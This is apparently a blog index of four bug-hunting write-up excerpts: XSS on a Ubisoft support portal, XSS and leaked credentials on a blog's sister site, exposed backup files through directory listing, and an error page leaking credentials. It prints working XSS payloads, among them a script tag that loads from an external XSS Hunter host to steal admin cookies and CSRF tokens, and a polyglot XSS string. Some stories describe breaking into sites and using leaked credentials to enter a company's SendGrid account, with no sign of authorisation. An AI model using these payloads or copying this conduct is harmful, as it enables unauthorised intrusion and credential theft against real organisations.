Posts

UBISOFT | BLIND XSS TO CUSTOMER SUPPORT PANEL TAKEOVER

Hey folks! Hope y'all are great. I recently found an XSS in support.ubisoft.com which allowed an attacker to take over the customer support panel:
Vulnerability: Cross-Site Scripting
Identifying the vulnerability: While I was facing a problem in WD2 I got to know about http://support.ubi.com. I opened a ticket for that, and I got the idea of why not test it out for XSS, so I sent the following payload:
<script>alert("XSS POC BY HX01");</script> and boom!


Exploitation: Since the web app was vulnerable to XSS, I added a payload from xsshunter.com to steal the admin cookies, CSRF token, etc.:
"><script src=https://usociety.xss.ht></script> Now time to make the victim visit the URL:


Since some of the admin cookies were HttpOnly I wasn't able to log in with them; however, thanks to XSS Hunter I was able to get the IP, the CSRF token (which could have led to compromising the agent) and some ticket information, plus some player IDs from another XSS trigger:
Reported the …

MANGOBAAZ HACKED | XSS TO CREDENTIALS EXPOSURE TO PWN

Vulnerabilities identified: XSS, improper error handling
Hey folks! Hope y'all are fine. I recently got access to a Pakistani blog, @mangobaaz, and here is the writeup of how I was able to hack into it.
INFORMATION GATHERING: While gathering information I came across a website, "hungerist.com", which was owned by MangoBaaz. The signup page caught my attention, so I selected it to penetrate.


IDENTIFYING VULNERABILITY: I added the XSS payload in the NAME field: <script>alert("XSS BY HX01");</script> and BOOM! XSSed:

Since I was trying to steal cookies, I tried another payload:

<iframe src=" jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e "></iframe> An XSS didn't trigger, but an error did:
Since the error handling was improper, it leaked some credentials :D including…

Directory Listing To Sensitive Files Exposure

Vulnerability: Directory Listing
Since the website is private and can't be disclosed, let's name it Redacted.com. While surfing across the website I came to know that it was vulnerable to directory listing. Since the website was using WordPress as the CMS, I knew I wouldn't find much else as it was already up to date, and I didn't find anything interesting at Redacted.com/wp-content/uploads/, so I decided to enumerate the directories manually since I didn't have access to DirBuster at that time. I found some dirs like Redacted.com/images, Redacted.com/assets, and the fishy one, "Redacted.com/uploads". Redacted.com/uploads included a lot of images and three dirs: "stores", "shipments" and "voucher":
Nothing saucy was found in "Redacted.com/uploads/stores", therefore I opened voucher and BOOM! There were some backup files (not sure of it, but they were sensitive and left public), i.e. *I don't have any other screenshots as it was not ethical to*:
 and hence this…

Recon To Admin Credentials Disclosure

Vulnerability: Information leakage due to improper error handling
It all started with a cup of tea and the curiosity to hack into my mobile network provider. I usually start my recon by firing Google dorks and Sniper. Since the name of that company can't be disclosed, let's substitute it with xyz.com.

Firing this dork, inurl:xyz, I was able to get my target; the web app looked like a VPBX portal for marketing businesses and call centers:

I tried DirBuster but was not able to find anything, and only the default HTTP and HTTPS ports were open. Since nothing else was left, I gave "Request A Free Demo" a try with fake details to avoid spam, and BOOM! This error showed up:
And this error leaked some credentials:

TIME TO EXPLOIT: Since the DB was only accessible through an internal IP I wasn't able to exploit it; however, I got access to the company's SendGrid account, which was enough:

Best Regards, @Hx01